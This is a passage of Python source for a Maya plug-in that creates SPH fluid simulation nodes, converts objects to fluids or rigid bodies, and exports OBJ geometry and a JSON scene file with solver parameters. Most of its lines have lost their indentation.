cmds.setAttr((node + '.SPH_particleField'), "velocity", type="string")
# set expression
cmds.addAttr(node, longName="SPH_expressionX", niceName="expression - x",dt="string")
cmds.setAttr((node + '.SPH_expressionX'), "", type="string")
cmds.addAttr(node, longName="SPH_expressionY", niceName="expression - y",dt="string")
cmds.setAttr((node + '.SPH_expressionY'), "", type="string")
cmds.addAttr(node, longName="SPH_expressionZ", niceName="expression - z",dt="string")
cmds.setAttr((node + '.SPH_expressionZ'), "", type="string")
def undoIt(self):
pass
def isUndoable(self):
return True
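# Usage sketch (assumes the plug-in is loaded so the commands are registered):
#   cmds.createRectangularEmitter()   # box emitter with SPH_* attributes
#   cmds.createCircularEmitter()      # disc emitter
#   cmds.createAnimationField(s=1)    # -s/-shape flag: 0 = box, 1 = sphere, 2 = cylinder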
######################################################
# convertToFluid
#
# Converts a list of transform nodes to fluid models.
# Only nodes with a shape are converted.
######################################################
class convertToFluidCmd(OpenMayaMPx.MPxCommand):
s_name = "convertToFluid"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return convertToFluidCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
nodes = PluginFunctions.getSelectedTransforms()
self.convertToFluid(nodes)
def convertToFluid(self, nodes):
for node in nodes:
shapeNode = PluginFunctions.getShape(node)
if shapeNode != None:
lst = cmds.listRelatives(node, children=True, type='SPHFluidNode' )
if (lst == None):
cmds.createNode("SPHFluidNode", name="SPH_Fluid", parent=node)
else:
print("The node " + node + " is already an SPH fluid.")
######################################################
# convertToRigidBody
#
# Converts a list of transform nodes to rigid bodies.
# Only nodes with a shape are converted.
######################################################
class convertToRigidBodiesCmd(OpenMayaMPx.MPxCommand):
s_name = "convertToRigidBodies"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return convertToRigidBodiesCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
nodes = PluginFunctions.getSelectedTransforms()
self.convertToRigidBody(nodes)
def convertToRigidBody(self, nodes):
for node in nodes:
shapeNode = PluginFunctions.getShape(node)
if shapeNode != None:
lst = cmds.listRelatives(node, children=True, type='SPHRigidBodyNode' )
if (lst == None):
cmds.createNode("SPHRigidBodyNode", name="SPH_Rigid_Body", parent=node)
else:
print("The node " + node + " is already an SPH rigid body.")
######################################################
# saveModel
######################################################
class saveModelCmd(OpenMayaMPx.MPxCommand):
s_name = "saveModel"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return saveModelCmd()
def doIt(self, args):
self.redoIt()
def redoIt(self):
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=True )
if len(sphConfigList) == 0:
cmds.warning("Not saved since no SPH configuration node was found.")
return
if not cmds.pluginInfo("objExport", query=True, loaded=True):
cmds.loadPlugin("objExport")
        fileName = cmds.fileDialog2(ff="*.json", fm=0, dir="")
        if fileName == None:
            return
        scenePath = os.path.dirname(fileName[0])
scene=self.generateScene(scenePath)
if scene == None:
return
        json_str = json.dumps(scene, sort_keys=True, indent=4, separators=(',', ': '))
        with open(fileName[0], 'w') as f:
            f.write(json_str)
def isUndoable(self):
return False
######################################################
# openFluidIdDialog
######################################################
def openFluidIdDialog(self):
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=False )
cmds.columnLayout( adjustableColumn=True, columnOffset=["both", 10], rowSpacing=10, columnAlign="center" )
cmds.textScrollList("SPHFluidIdList", numberOfRows=8, allowMultiSelection=False,
append=sphConfigList,
selectItem=sphConfigList[0], showIndexedItem=1)
cmds.rowLayout(numberOfColumns=2)
cmds.button("Ok", c='cmds.layoutDialog( dismiss="Ok " + cmds.textScrollList("SPHFluidIdList",q=True,selectItem=True)[0] )' )
cmds.button("Cancel", c='cmds.layoutDialog( dismiss="Cancel" )')
######################################################
# generate scene
######################################################
def generateScene(self, scenePath):
scene = OrderedDict()
scene['FluidModels'] = []
scene['RigidBodies'] = []
scene['Emitters'] = []
scene['AnimationFields'] = []
scene['Materials'] = []
scene['Configuration'] = OrderedDict()
sphConfigList = cmds.ls( type='SPHConfigurationNode', long=True )
sphConfig = ""
if len(sphConfigList) == 0:
cmds.warning("Not saved since no SPH configuration node was found.")
return None
elif len(sphConfigList) > 1:
sphConfig = sphConfigList[0]
res = cmds.layoutDialog(ui=self.openFluidIdDialog)
if res == "Cancel":
return None
else:
sphConfig = res[3:]
else:
sphConfig = sphConfigList[0]
#cmds.warning("More than one SPH configuration node was found using " + sphConfigList[0] + ".")
attributes = cmds.listAttr(sphConfig, string="SPH_*", sn=False)
for attr in attributes:
if cmds.getAttr(sphConfig + "." + attr, type=True) == "float3":
value = cmds.getAttr(sphConfig + "." + attr)[0]
elif cmds.getAttr(sphConfig + "." + attr, type=True) == "long3":
value = cmds.getAttr(sphConfig + "." + attr)[0]
else:
value = cmds.getAttr(sphConfig + "." + attr)
            # avoid writing child attributes
parent = cmds.attributeQuery( attr, node=sphConfig, listParent=True )
if parent == None:
scene["Configuration"][attr[4:]] = value
fluidConfigList = cmds.ls( type='SPHFluidConfigurationNode', long=False )
if len(fluidConfigList) == 0:
cmds.warning("Not saved since no fluid material node was found.")
return
for fluid in fluidConfigList:
attributes = cmds.listAttr(fluid, string="SPH_*", sn=False)
mat = OrderedDict()
mat['id'] = fluid
for attr in attributes:
if cmds.getAttr(fluid + "." + attr, type=True) == "float3":
value = cmds.getAttr(fluid + "." + attr)[0]
elif cmds.getAttr(fluid + "." + attr, type=True) == "long3":
value = cmds.getAttr(fluid + "." + attr)[0]
else:
value = cmds.getAttr(fluid + "." + attr)
mat[attr[4:]] = value
scene["Materials"].append(mat)
rigidBodyList = cmds.ls( type='SPHRigidBodyNode', long=False )
for rb in rigidBodyList:
self.addRigidBody(scene, rb, scenePath)
fluidList = cmds.ls( type='SPHFluidNode', long=False )
for fluid in fluidList:
self.addFluid(scene, fluid, scenePath)
emitters = PluginFunctions.getAllNodesOfType("RectangularEmitter")
for emitter in emitters:
self.addRectangularEmitter(sphConfig, scene, emitter, scenePath)
emitters = PluginFunctions.getAllNodesOfType("CircularEmitter")
for emitter in emitters:
self.addCircularEmitter(sphConfig, scene, emitter, scenePath)
animFields = PluginFunctions.getAllNodesOfType("AnimationField")
for animField in animFields:
self.addAnimationField(sphConfig, scene, animField, scenePath)
return scene
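    # Sketch of the JSON document produced above (keys mirror the code; the
    # concrete values depend on the scene):
    #   {
    #     "Configuration":   {"particleRadius": 0.025, "timeStepSize": 0.001, ...},
    #     "Materials":       [{"id": "Fluid", "viscosity": 0.01, ...}],
    #     "RigidBodies":     [{"geometryFile": "rb_<name>.obj", ...}],
    #     "FluidModels":     [{"particleFile": "fluid_<name>.obj", ...}],
    #     "Emitters":        [{"type": 0, "velocity": 1.0, ...}],
    #     "AnimationFields": [{"particleField": "velocity", ...}]
    #   }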
######################################################
# getCurrentParticleRadius
######################################################
def getCurrentParticleRadius(self, sphConfig):
return cmds.getAttr(sphConfig + ".particleRadius")
######################################################
# add rigid bodies
######################################################
def addRigidBody(self, scene, rbNode, scenePath):
        # select the parent transform node
        tr = cmds.listRelatives( rbNode, allParents=True )
        cmds.select(tr, replace=True)
        # export geometry
polyTri = cmds.polyTriangulate()
name = cmds.ls( selection=True, type='transform', long=False )[0]
fileName = os.path.join(scenePath, "rb_" + name + ".obj")
cmds.file(fileName, force=True, options="groups=0;ptgroups=0;materials=0;smoothing=0;normals=0", pr=True, exportSelected=True, type="OBJexport")
cmds.delete(polyTri)
attributes = cmds.listAttr(rbNode, string="SPH_*", sn=False)
rb = OrderedDict()
for attr in attributes:
if cmds.getAttr(rbNode + "." + attr, type=True) == "float3":
value = cmds.getAttr(rbNode + "." + attr)[0]
elif cmds.getAttr(rbNode + "." + attr, type=True) == "long3":
value = cmds.getAttr(rbNode + "." + attr)[0]
else:
value = cmds.getAttr(rbNode + "." + attr)
            # avoid writing child attributes
parent = cmds.attributeQuery( attr, node=rbNode, listParent=True )
if parent == None:
rb[attr[4:]] = value
rb['translation'] = [0,0,0]
rb['rotationaxis'] = [1,0,0]
rb['rotationangle'] = 0.0
rb['scale'] = [1,1,1]
rb['geometryFile'] = "rb_" + name + ".obj"
scene['RigidBodies'].append(rb)
#color = cmds.getAttr(rbNode + ".SPH_color")[0]
#color = color + (1.0,)
######################################################
# add fluid
######################################################
def addFluid(self, scene, fluidNode, scenePath):
        # select the parent transform node
        tr = cmds.listRelatives( fluidNode, allParents=True )
        cmds.select(tr, replace=True)
particleFile = cmds.getAttr(fluidNode + ".particleFile")
name = ""
if (particleFile == ""):
polyTri = cmds.polyTriangulate()
name = cmds.ls( selection=True, type='transform', long=False )[0]
fileName = os.path.join(scenePath, "fluid_" + name + ".obj")
cmds.file(fileName, force=True, options="groups=0;ptgroups=0;materials=0;smoothing=0;normals=0", pr=True, exportSelected=True, type="OBJexport")
cmds.delete(polyTri)
attributes = cmds.listAttr(fluidNode, string="SPH_*", sn=False)
fluid = OrderedDict()
for attr in attributes:
if cmds.getAttr(fluidNode + "." + attr, type=True) == "float3":
value = cmds.getAttr(fluidNode + "." + attr)[0]
elif cmds.getAttr(fluidNode + "." + attr, type=True) == "long3":
value = cmds.getAttr(fluidNode + "." + attr)[0]
else:
value = cmds.getAttr(fluidNode + "." + attr)
            # avoid writing child attributes
parent = cmds.attributeQuery( attr, node=fluidNode, listParent=True )
if parent == None:
fluid[attr[4:]] = value
if (particleFile == ""):
fluid['particleFile'] = "fluid_" + name + ".obj"
fluid['translation'] = [0,0,0]
fluid['rotationaxis'] = [1,0,0]
fluid['rotationangle'] = 0.0
fluid['scale'] = [1,1,1]
scene['FluidModels'].append(fluid)
######################################################
# add rectangular emitter
######################################################
def addRectangularEmitter(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
# get particleRadius
radius = self.getCurrentParticleRadius(sphConfig)
diam = 2.0 * radius
s[1] -= 2.0*diam
s[2] -= 2.0*diam
axisAngle = PluginFunctions.getAxisAngle(node)
startTime = cmds.getAttr(node + ".SPH_startTime")
endTime = cmds.getAttr(node + ".SPH_endTime")
velocity = cmds.getAttr(node + ".SPH_velocity")
id = cmds.getAttr(node + ".SPH_fluidId")
emitter = {
'id': id,
'width': int(s[2]/diam),
'height': int(s[1]/diam),
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'emitStartTime': startTime,
'emitEndTime': endTime,
'velocity' : velocity,
'type' : 0
}
scene['Emitters'].append(emitter)
######################################################
# add circular emitter
######################################################
def addCircularEmitter(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
# get particleRadius
radius = self.getCurrentParticleRadius(sphConfig)
s[1] -= 2.0*radius
axisAngle = PluginFunctions.getAxisAngle(node)
startTime = cmds.getAttr(node + ".SPH_startTime")
endTime = cmds.getAttr(node + ".SPH_endTime")
velocity = cmds.getAttr(node + ".SPH_velocity")
id = cmds.getAttr(node + ".SPH_fluidId")
emitter = {
'id': id,
'width': int(s[1]/radius),
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'emitStartTime': startTime,
'emitEndTime': endTime,
'velocity' : velocity,
'type' : 1
}
scene['Emitters'].append(emitter)
######################################################
# add animation field
######################################################
def addAnimationField(self, sphConfig, scene, node, scenePath):
t = cmds.xform(node, query=True, t=True, ws=True)
s = cmds.xform(node, query=True, s=True, ws=True)
axisAngle = PluginFunctions.getAxisAngle(node)
particleField = cmds.getAttr(node + ".SPH_particleField")
shapeType = cmds.getAttr(node + ".SPH_shapeType")
expression_x = cmds.getAttr(node + ".SPH_expressionX")
expression_y = cmds.getAttr(node + ".SPH_expressionY")
expression_z = cmds.getAttr(node + ".SPH_expressionZ")
animField = {
'particleField': particleField,
'translation': t,
'rotationAxis': axisAngle[0],
'rotationAngle': axisAngle[1],
'scale': s,
'shapeType': shapeType,
'expression_x' : expression_x,
'expression_y' : expression_y,
'expression_z' : expression_z
}
scene['AnimationFields'].append(animField)
def addAttributesToSPHNode(node):
# add attributes
for key in node.sphParameters:
params = node.sphParameters[key]
for param in params:
paramType = param["type"]
paramName = param["name"]
paramLabel = param["label"]
if paramType == "bool":
attr = PluginFunctions.createBoolAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "float":
attr = PluginFunctions.createFloatAttr("SPH_" + paramName, paramName, param["value"], param["min"], param["max"], param["fieldMin"], param["fieldMax"])
node.addAttribute( attr )
elif paramType == "int":
attr = PluginFunctions.createIntAttr("SPH_" + paramName, paramName, param["value"], param["min"], param["max"], param["fieldMin"], param["fieldMax"])
node.addAttribute( attr )
elif paramType == "vec3":
attr = PluginFunctions.createVec3Attr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "color":
attr = PluginFunctions.createColorAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "vec3i":
attr = PluginFunctions.createVec3iAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
elif paramType == "enum":
attr = PluginFunctions.createEnumAttr("SPH_" + paramName, paramName, param["value"], param["enumList"])
node.addAttribute( attr )
elif paramType == "string":
attr = PluginFunctions.createStringAttr("SPH_" + paramName, paramName, param["value"])
node.addAttribute( attr )
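# Illustrative mapping (comment only): a parameter dict such as
#   createFloatParam("particleRadius", "Particle radius", "...", 0.025, 0.0001, 1000.0, 0)
# becomes a float attribute "SPH_particleRadius" (short name "particleRadius")
# with default 0.025, soft range [0.0001, 1000.0] and hard range [0, 1000000]
# on every node class that lists it in its sphParameters.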
# Node definition
class SPHConfigurationNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90000)
kPluginNodeTypeName = "SPHConfigurationNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHConfigurationNode.initParameters()
addAttributesToSPHNode(SPHConfigurationNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHConfigurationNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHConfigurationNode.output ):
# dataHandle = dataBlock.inputValue( SPHConfigurationNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHConfigurationNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHConfigurationNode.sphParameters["General"] = [
PluginFunctions.createBoolParam("pause", "Pause", "Pause simulation after loading.", True),
PluginFunctions.createFloatParam("timeStepSize", "Time step size", "Time step size", 0.001, 0.00001, 1.0),
PluginFunctions.createFloatParam("pauseAt", "Pause simulation at", "Pause simulation at the given time. When the value is negative, the simulation is not paused.", -1, -1, 100, -1),
PluginFunctions.createFloatParam("stopAt", "Stop simulation at", "Stop simulation at the given time. When the value is negative, the simulation is not stopped.", -1, -1, 100, -1)
]
SPHConfigurationNode.sphParameters["Visualization"] = [
PluginFunctions.createVec3Param("cameraPosition", "Camera position", "Initial position of the camera.", [0.0,3.0,8.0]),
PluginFunctions.createVec3Param("cameraLookat", "Camera lookat", "Lookat point of the camera.", [0.0,0.0,0.0]),
PluginFunctions.createIntParam("numberOfStepsPerRenderUpdate", "# time steps / update", "Number of simulation steps per rendered frame.", 4, 1, 100),
PluginFunctions.createEnumParam("renderWalls", "Render walls", "Make walls visible/invisible.", 4, ["None", "Particles (all)", "Particles (no walls)", "Geometry (all)", "Geometry (no walls)"]),
]
SPHConfigurationNode.sphParameters["Export"] = [
PluginFunctions.createBoolParam("enablePartioExport", "Partio export", "Enable/disable partio export.", False),
PluginFunctions.createBoolParam("enableRigidBodyExport", "Rigid body export", "Enable/disable rigid body export.", False),
PluginFunctions.createBoolParam("enableVTKExport", "VTK export", "Enable/disable VTK export.", False),
PluginFunctions.createBoolParam("enableRigidBodyVTKExport", "Rigid body VTK export", "Enable/disable rigid body VTK export.", False),
PluginFunctions.createFloatParam("dataExportFPS", "Export FPS", "Frame rate of particle export.", 25, 0.1, 1000),
PluginFunctions.createStringParam("particleAttributes", "Export attributes", "Attributes that are exported in the particle files (except id and position).", "velocity"),
PluginFunctions.createBoolParam("enableStateExport", "State export", "Enable/disable simulation state export.", False),
PluginFunctions.createFloatParam("stateExportFPS", "State export FPS", "Frame rate of state export.", 1, 0.1, 1000)
]
SPHConfigurationNode.sphParameters["Simulation"] = [
PluginFunctions.createBoolParam("sim2D", "2D simulation", "2D/3D simulation.", False),
PluginFunctions.createBoolParam("enableZSort", "Enable z-sort", "Enable z-sort to improve cache hits.", True),
PluginFunctions.createFloatParam("particleRadius", "Particle radius", "Radius of the fluid particles.", 0.025, 0.0001, 1000.0, 0),
PluginFunctions.createVec3Param("gravitation", "Gravitation", "Vector to define the gravitational acceleration.", [0,-9.81,0]),
PluginFunctions.createEnumParam("simulationMethod", "Simulation method", "Simulation method.", 4, ["WCSPH", "PCISPH", "PBF", "IISPH", "DFSPH", "Projective Fluids"]),
PluginFunctions.createIntParam("maxIterations", "Max. iterations", "Maximal number of iterations of the pressure solver.", 100, 1, 1000, 1),
PluginFunctions.createFloatParam("maxError", "Max. density error(%)", "Maximal density error (%).", 0.01, 1.0e-6, 1.0, 0),
PluginFunctions.createEnumParam("boundaryHandlingMethod", "Boundary handling method", "Boundary handling method.", 2, ["Akinci et al. 2012", "Koschier and Bender 2017", "Bender et al. 2019"])
]
SPHConfigurationNode.sphParameters["CFL"] = [
PluginFunctions.createEnumParam("cflMethod", "CFL - method", "CFL method used for adaptive time stepping.", 1, ["None", "CFL", "CFL - iterations"]),
PluginFunctions.createFloatParam("cflFactor", "CFL - factor", "Factor to scale the CFL time step size.", 0.5, 1e-6, 10.0, 0),
PluginFunctions.createFloatParam("cflMinTimeStepSize", "CFL - min. time step size", "Min. time step size.", 0.0001, 1e-7, 1.0, 0),
PluginFunctions.createFloatParam("cflMaxTimeStepSize", "CFL - max. time step size", "Max. time step size.", 0.005, 1e-6, 1.0, 0)
]
SPHConfigurationNode.sphParameters["Kernel"] = [
PluginFunctions.createEnumParam("kernel", "Kernel", "Kernel function used in the SPH model (in 2D use only cubic or Wendland).", 4, ["Cubic spline", "Wendland quintic C2", "Poly6", "Spiky", "Precomputed cubic spline"]),
PluginFunctions.createEnumParam("gradKernel", "Gradient of kernel", "Gradient of the kernel function used in the SPH model (in 2D use only cubic or Wendland).", 4, ["Cubic spline", "Wendland quintic C2", "Poly6", "Spiky", "Precomputed cubic spline"])
]
SPHConfigurationNode.sphParameters["WCSPH"] = [
PluginFunctions.createFloatParam("stiffness", "Stiffness", "Stiffness coefficient of EOS.", 10000, 0, 500000),
PluginFunctions.createFloatParam("exponent", "Exponent (gamma)", "Exponent of EOS.", 7.0, 1.0e-6, 10.0, 0)
]
SPHConfigurationNode.sphParameters["PBF"] = [
PluginFunctions.createEnumParam("velocityUpdateMethod", "Velocity update method", "Method for the velocity integration.", 0, ["First Order Update", "Second Order Update"])
]
SPHConfigurationNode.sphParameters["DFSPH"] = [
PluginFunctions.createIntParam("maxIterationsV", "Max. iterations (divergence)", "Maximal number of iterations of the divergence solver.", 100, 1, 1000, 1),
PluginFunctions.createFloatParam("maxErrorV", "Max. divergence error(%)", "Maximal divergence error (%).", 0.01, 1.0e-6, 1.0, 0),
PluginFunctions.createBoolParam("enableDivergenceSolver", "Enable divergence solver", "Turn divergence solver on/off.", True)
]
SPHConfigurationNode.sphParameters["Projective Fluids"] = [
PluginFunctions.createFloatParam("stiffnessPF", "Stiffness", "Stiffness coefficient.", 50000, 0, 500000)
]
# Node definition
class SPHFluidConfigurationNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90001)
kPluginNodeTypeName = "SPHFluidConfigurationNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
# initializer
@staticmethod
def initialize():
SPHFluidConfigurationNode.initParameters()
addAttributesToSPHNode(SPHFluidConfigurationNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHFluidConfigurationNode() )
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHFluidConfigurationNode.sphParameters["Simulation"] = [
PluginFunctions.createFloatParam("density0", "Rest density", "Rest density of the fluid.", 1000.0, 0.1, 10000.0)
]
SPHFluidConfigurationNode.sphParameters["Visualization"] = [
PluginFunctions.createStringParam("colorField", "Color field", "Choose vector or scalar field for particle coloring.", "velocity"),
PluginFunctions.createEnumParam("colorMapType", "Color map type", "Selection of a color map for coloring the scalar/vector field.", 1, ["None", "Jet", "Plasma"]),
PluginFunctions.createFloatParam("renderMinValue", "Min. value", "Minimal value used for color-coding the color field in the rendering process.", 0, -1000, 1000, -1000000),
PluginFunctions.createFloatParam("renderMaxValue", "Max. value", "Maximal value used for color-coding the color field in the rendering process.", 5, -1000, 1000, -1000000)
]
SPHFluidConfigurationNode.sphParameters["Emitters"] = [
PluginFunctions.createIntParam("maxEmitterParticles", "Max. number of emitted particles", "Maximum number of emitted particles", 10000, 1, 10000000, 0, 100000000),
PluginFunctions.createBoolParam("emitterReuseParticles", "Reuse particles", "Reuse particles if they are outside of the bounding box defined by emitterBoxMin, emitterBoxMaRex.", False),
PluginFunctions.createVec3Param("emitterBoxMin", "Emitter box min.", "Minimum coordinates of an axis-aligned box (used in combination with emitterReuseParticles).", [0.0,0.0,0.0]),
PluginFunctions.createVec3Param("emitterBoxMax", "Emitter box max.", "Maximum coordinates of an axis-aligned box (used in combination with emitterReuseParticles).", [1.0,1.0,1.0])
]
SPHFluidConfigurationNode.sphParameters["Viscosity"] = [
PluginFunctions.createEnumParam("viscosityMethod", "Viscosity", "Method to compute viscosity forces.", 1, ["None", "Standard", "XSPH", "Bender and Koschier 2017", "Peer et al. 2015", "Peer et al. 2016", "Takahashi et al. 2015 (improved)", "Weiler et al. 2018"]),
PluginFunctions.createFloatParam("viscosity", "Viscosity coefficient", "Coefficient for the viscosity force computation.", 0.01, 0, 1000, 0),
PluginFunctions.createIntParam("viscoMaxIter", "Max. iterations (visco)", "(Implicit solvers) Max. iterations of the viscosity solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("viscoMaxError", "Max. visco error", "(Implicit solvers) Max. error of the viscosity solver.", 0.01, 1e-6, 1, 0),
PluginFunctions.createIntParam("viscoMaxIterOmega", "Max. iterations (vorticity diffusion)", "(Peer et al. 2016) Max. iterations of the vorticity diffusion solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("viscoMaxErrorOmega", "Max. vorticity diffusion error", "(Peer et al. 2016) Max. error of the vorticity diffusion solver.", 0.01, 1e-6, 1, 0),
PluginFunctions.createFloatParam("viscosityBoundary", "Viscosity coefficient (Boundary)", "Coefficient for the viscosity force computation at the boundary.", 0.0, 0, 1000, 0)
]
SPHFluidConfigurationNode.sphParameters["Vorticity"] = [
PluginFunctions.createEnumParam("vorticityMethod", "Vorticity method", "Method to compute vorticity forces.", 0, ["None", "Micropolar model", "Vorticity confinement"]),
PluginFunctions.createFloatParam("vorticity", "Vorticity coefficient", "Coefficient for the vorticity force computation.", 0.01, 0, 10.0, 0),
PluginFunctions.createFloatParam("viscosityOmega", "Angular viscosity coefficient", "Viscosity coefficient for the angular velocity field.", 0.1, 0, 10.0, 0),
PluginFunctions.createFloatParam("inertiaInverse", "Inertia inverse", "Inverse microinertia used in the micropolar model.", 0.5, 0, 10.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Drag force"] = [
PluginFunctions.createEnumParam("dragMethod", "Drag method", "Method to compute drag forces.", 0, ["None", "Macklin et al. 2014", "Gissler et al. 2017"]),
PluginFunctions.createFloatParam("drag", "Drag coefficient", "Coefficient for the drag force computation.", 0.01, 0, 100.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Surface tension"] = [
PluginFunctions.createEnumParam("surfaceTensionMethod", "Surface tension method", "Method to compute surface tension forces.", 0, ["None", "Becker & Teschner 2007", "Akinci et al. 2013", "He et al. 2014"]),
PluginFunctions.createFloatParam("surfaceTension", "Surface tension coefficient", "Coefficient for the surface tension computation.", 0.05, 0, 100.0, 0)
]
SPHFluidConfigurationNode.sphParameters["Elasticity"] = [
PluginFunctions.createEnumParam("elasticityMethod", "Elasticity method", "Method to compute elastic forces.", 0, ["None", "Becker et al. 2009", "Peer et al. 2018"]),
PluginFunctions.createFloatParam("youngsModulus", "Young's modulus", "Stiffness of the elastic material.", 100000.0, 0, 1000.0, 0),
PluginFunctions.createFloatParam("poissonsRatio", "Poisson's ratio", "Ratio of transversal expansion and axial compression.", 0.3, -0.9999, 0.4999, -0.9999),
PluginFunctions.createIntParam("elasticityMaxIter", "Max. iterations (elasticity)", "(Implicit solvers) Max. iterations of the elasticity solver.", 100, 1, 1000),
PluginFunctions.createFloatParam("elasticityMaxError", "Max. elasticity error", "(Implicit solvers) Max. error of the elasticity solver.", 0.0001, 1e-6, 1, 0),
PluginFunctions.createFloatParam("alpha", "Zero-energy modes suppression", "Coefficent for zero-energy modes suppression method.", 0.0, 0, 10000.0, 0)
]
class SPHFluidNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90002)
kPluginNodeTypeName = "SPHFluidNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHFluidNode.initParameters()
addAttributesToSPHNode(SPHFluidNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHFluidNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHFluidNode.output ):
# dataHandle = dataBlock.inputValue( SPHFluidNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHFluidNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHFluidNode.sphParameters["General"] = [
PluginFunctions.createStringParam("id", "Fluid id", "Id of the fluid material.", "Fluid"),
PluginFunctions.createVec3Param("initialVelocity", "Initial velocity", "Initial velocity of the fluid.", [0.0,0.0,0.0]),
PluginFunctions.createVec3Param("initialAngularVelocity", "Initial angular velocity", "Initial angular velocity of the fluid.", [0.0,0.0,0.0]),
PluginFunctions.createVec3iParam("resolutionSDF", "SDF resolution", "Resolution of the SDF.", [20,20,20]),
PluginFunctions.createBoolParam("invert", "Invert SDF", "Invert the SDF, flips inside/outside.", False),
PluginFunctions.createEnumParam("denseMode", "Dense mode", "Sampling mode.", 0, ["Regular", "Almost dense", "Dense"]),
PluginFunctions.createStringParam("particleFile", "Particle sampling file", "Particle sampling file.", ""),
]
class SPHRigidBodyNode(OpenMayaMPx.MPxLocatorNode):
kPluginNodeId = OpenMaya.MTypeId(0x90003)
kPluginNodeTypeName = "SPHRigidBodyNode"
# class variables
input = OpenMaya.MObject()
dataAttr = OpenMaya.MObject()
sphParameters = OrderedDict()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
def postConstructor(self):
OpenMayaMPx.MPxLocatorNode.postConstructor(self)
# initializer
@staticmethod
def initialize():
SPHRigidBodyNode.initParameters()
addAttributesToSPHNode(SPHRigidBodyNode)
# creator
@staticmethod
def creator():
return OpenMayaMPx.asMPxPtr( SPHRigidBodyNode() )
def compute(self,plug,dataBlock):
# if ( plug == SPHRigidBodyNode.output ):
# dataHandle = dataBlock.inputValue( SPHRigidBodyNode.input )
# inputFloat = dataHandle.asFloat()
# result = math.sin( inputFloat ) * 10.0
# outputHandle = dataBlock.outputValue( SPHRigidBodyNode.output )
# outputHandle.setFloat( result )
# dataBlock.setClean( plug )
return OpenMaya.kUnknownParameter
######################################################
# initParameters
######################################################
@staticmethod
def initParameters():
SPHRigidBodyNode.sphParameters["General"] = [
PluginFunctions.createBoolParam("isDynamic", "Dynamic", "Defines if the body is static or dynamic.", False),
PluginFunctions.createBoolParam("isWall", "Wall", "Defines if this is a wall. Walls are typically not rendered. This is the only difference.", False),
PluginFunctions.createColorParam("color", "Color", "Color of the body", [0.2, 0.2, 0.2]),
PluginFunctions.createFloatParam("density", "Density", "Rest density of the body.", 1000.0, 0, 100000.0, 0),
PluginFunctions.createVec3iParam("mapResolution", "Map resolution", "Resolution of the volume/density map.", [20,20,20]),
PluginFunctions.createBoolParam("mapInvert", "Invert map", "Invert the volume/density map, flips inside/outside.", False),
PluginFunctions.createFloatParam("mapThickness", "Map thickness", "Thickness of the map.", 0.0, 0, 100.0, 0),
PluginFunctions.createVec3iParam("resolutionSDF", "SDF resolution", "Resolution of the SDF.", [20,20,20]),
PluginFunctions.createBoolParam("invert", "Invert SDF", "Invert the SDF, flips inside/outside.", False),
PluginFunctions.createEnumParam("samplingMode", "Sampling mode", "Sampling mode.", 0, ["Poisson disk sanmpling", "Regular triangle sampling"]),
]
######################################################
# loadRigidBodies
#
# load rigid body data that was exported by
# a SPH simulation
######################################################
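# Binary layout of the exported frame files, as inferred from the struct.unpack
# calls below. The first frame file contains, in order:
#   int32        number of bodies
#   per body:    int32 file-name length, char[n] OBJ file name,
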